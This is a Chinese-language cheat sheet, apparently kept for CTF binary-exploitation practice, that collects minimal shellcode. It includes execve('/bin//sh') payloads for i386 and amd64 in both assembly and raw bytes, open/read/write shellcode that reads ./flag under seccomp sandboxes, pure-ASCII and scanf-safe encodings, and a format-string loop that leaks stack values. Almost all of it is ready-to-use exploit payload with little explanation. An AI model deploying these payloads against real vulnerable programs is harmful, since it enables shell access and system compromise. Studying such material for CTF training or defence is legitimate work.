最短shellcode

i386长度18

1
2
3
4
5
6
7
push   0xb
pop    eax
push   ebx
push   0x68732f2f
push   0x6e69622f
mov    ebx,esp
int    0x80

amd64长度22

1
2
3
4
5
6
7
8
9
xor 	rsi,	rsi			
push	rsi				
mov 	rdi,	0x68732f2f6e69622f	 
push	rdi
push	rsp		
pop	rdi				
mov 	al,	59			
cdq					
syscall

沙盒下最短shellcode

64位

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
shellcode='''
    xor rax, rax   #xor rax,rax是对rax的清零运算操作
    xor rdi, rdi   #清空rdi寄存器的值
    xor rsi, rsi   #清空rsi寄存器的值
    xor rdx, rdx
    mov rax, 2      #open调用号为2
    mov rdi, 0x67616c662f2e   #为galf/.为./flag的相反   0x67616c662f2e为/flag的ASCII码的十六进制
    push rdi
    mov rdi, rsp
    syscall   #系统调用前,linux在eax寄存器里写入子功能号,断止处理程序根据eax寄存器的值来判断用户进程申请哪类系统调用。

    mov rdx, 0x100   #sys_read(3,file,0x100)
    mov rsi, rdi
    mov rdi, rax
    mov rax, 0      #read调用号为0,0为文件描述符,即外部输入,例如键盘
    syscall
    
    mov rdi, 1      #sys_write(1,file,0x30)
    mov rax, 1      #write调用号为1,1为文件描述符,指的是屏幕
    syscall

'''

32位

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
shellcode = """
/*open(./flag)*/
push 0x1010101
xor dword ptr [esp], 0x1016660
push 0x6c662f2e
mov eax,0x5
mov ebx,esp
xor ecx,ecx
int 0x80
/*read(fd,buf,0x100)*/
mov ebx,eax
mov ecx,esp
mov edx,0x30
mov eax,0x3
int 0x80
/*write(1,buf,0x100)*/
mov ebx,0x1
mov eax,0x4
int 0x80
"""

32位

1
b'j\x0bXSh//shh/bin\x89\xe3\xcd\x80'
1
2
3
4
5
6
7
push   0xb
pop    eax
push   ebx
push   0x68732f2f
push   0x6e69622f
mov    ebx,esp
int    0x80

64位

1
b'H1\xf6VH\xbf/bin//shWT_\xb0;\x99\x0f\x05'
1
2
3
4
5
6
7
8
9
xor 	rsi,	rsi			
push	rsi				
mov 	rdi,	0x68732f2f6e69622f	 
push	rdi
push	rsp		
pop	rdi				
mov 	al,	59			
cdq					
syscall

32位 短字节shellcode –> 21字节

\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80

32位 纯ascii字符shellcode

PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJISZTK1HMIQBSVCX6MU3K9M7CXVOSC3XS0BHVOBBE9RNLIJC62ZH5X5PS0C0FOE22I2NFOSCRHEP0WQCK9KQ8MK0AA

32位 scanf可读取的shellcode

\xeb\x1b\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x29\xc0\xaa\x89\xf9\x89\xf0\xab\x89\xfa\x29\xc0\xab\xb0\x08\x04\x03\xcd\x80\xe8\xe0\xff\xff\xff/bin/sh

64位 scanf可读取的shellcode 22字节

\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\xb0\x3b\x99\x0f\x05

64位 较短的shellcode 23字节

\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05

64位 纯ascii字符shellcode

Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t

fmt查看栈神器

1
2
3
4
5
6
7
8
for i in range(1,30):

    payload1=b'AAAA.%'+str(i).encode()+b'$p!'
    p.sendlineafter("3.Buf overflow", b'1')
    sleep(0.1)
    p.sendline(payload1)
    t=p.recvuntil('!')[6:-1]
    stack.append(t)